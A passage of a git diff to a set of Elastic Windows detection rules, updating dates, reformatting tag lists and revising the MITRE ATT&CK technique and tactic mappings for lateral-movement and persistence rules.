Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -77,18 +67,16 @@ event.category : "file" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["file.path", "host.id"] diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index a74ff41d148..0c2fd0e28c6 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,18 +63,7 @@ references = [ risk_score = 73 rule_id = "25224a80-5a4a-4b8a-991e-6ab390465c4f" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,36 +80,46 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml index 22ecd3dc5c9..7737d941df9 100644 --- a/rules/windows/lateral_movement_via_wsus_update.toml +++ b/rules/windows/lateral_movement_via_wsus_update.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = ["https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authe risk_score = 47 rule_id = "8e2485b6-a74f-411b-bf7f-38b819f3a846" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,14 +79,26 @@ process.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index 3c87f58aebf..7cc39bbcbf0 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml +++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/31" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,16 +60,7 @@ references = [ risk_score = 73 rule_id = "6e9130a5-9be6-48e5-943a-9628bfc74b18" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -80,24 +71,26 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.ObjectDN:CN=Adm [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 06021e79ce1..92b99f7fa50 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -131,24 +131,13 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.010" -name = "Services File Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/010/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index c99c0974df7..6927c5276c6 100644 --- a/rules/windows/persistence_app_compat_shim.toml +++ b/rules/windows/persistence_app_compat_shim.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,19 +61,7 @@ Application Compatibility Shim databases are used in Windows to ensure older app risk_score = 47 rule_id = "c5ce48a6-7f57-4ee8-9313-3d0024caee10" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,19 +87,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.011" +name = "Application Shimming" +reference = "https://attack.mitre.org/techniques/T1546/011/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 7cad2254650..cd530d7df31 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,20 +61,7 @@ AppCert DLLs are dynamic link libraries that can be configured to load with ever risk_score = 47 rule_id = "513f0ffd-b317-4b9c-9494-92ce861f22c7" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -86,36 +73,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.009" -name = "AppCert DLLs" -reference = "https://attack.mitre.org/techniques/T1546/009/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml index 350bb9b904f..f123fa5bc79 100644 --- a/rules/windows/persistence_appinitdlls_registry.toml +++ b/rules/windows/persistence_appinitdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -116,20 +116,7 @@ This rule identifies modifications on the AppInit registry keys. risk_score = 47 rule_id = "d0e159cf-73e9-40d1-a9ed-077e3158a855" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -166,31 +153,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.010" name = "AppInit DLLs" reference = "https://attack.mitre.org/techniques/T1546/010/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml index 2141ad620c4..be533d6a05b 100644 --- a/rules/windows/persistence_browser_extension_install.toml +++ b/rules/windows/persistence_browser_extension_install.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,14 +115,18 @@ file where host.os.type == "windows" and event.type : "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1176" name = "Software Extensions" reference = "https://attack.mitre.org/techniques/T1176/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index d53df13516f..deb5c340772 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,19 +58,7 @@ references = [ risk_score = 73 rule_id = "2edc8076-291e-41e9-81e4-e3fcbc97ae5e" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -86,19 +74,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml index cdf2e8f627a..d3bf98a2e64 100644 --- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml +++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = [ risk_score = 47 rule_id = "6839c821-011d-43bd-bd5b-acff00257226" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,31 +91,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 078d2f2153c..92e133bbe17 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -161,31 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index ddc052d6393..3a73e312b2b 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,16 +55,7 @@ Active Directory (AD) is a critical component in Windows environments, managing risk_score = 47 rule_id = "6f024bde-7085-489b-8250-5957efdf1caf" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -79,26 +70,36 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml index e0bda7e66c5..991d2a51efd 100644 --- a/rules/windows/persistence_local_scheduled_task_creation.toml +++ b/rules/windows/persistence_local_scheduled_task_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ references = [ risk_score = 21 rule_id = "afcce5ad-65de-4ed2-8516-5e093d3ac99a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -91,19 +83,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml index f8f93d54439..a12faf74c32 100644 --- a/rules/windows/persistence_local_scheduled_task_scripting.toml +++ b/rules/windows/persistence_local_scheduled_task_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -28,17 +28,7 @@ Decode the base64 encoded Tasks Actions registry value to investigate the task's risk_score = 47 rule_id = "689b9d57-e4d5-4357-ad17-9c334609d79a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -57,41 +47,18 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml index 68aedd06281..a4b61f8ccd1 100644 --- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml +++ b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,16 +72,7 @@ Audit User Account Management (Success,Failure) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory 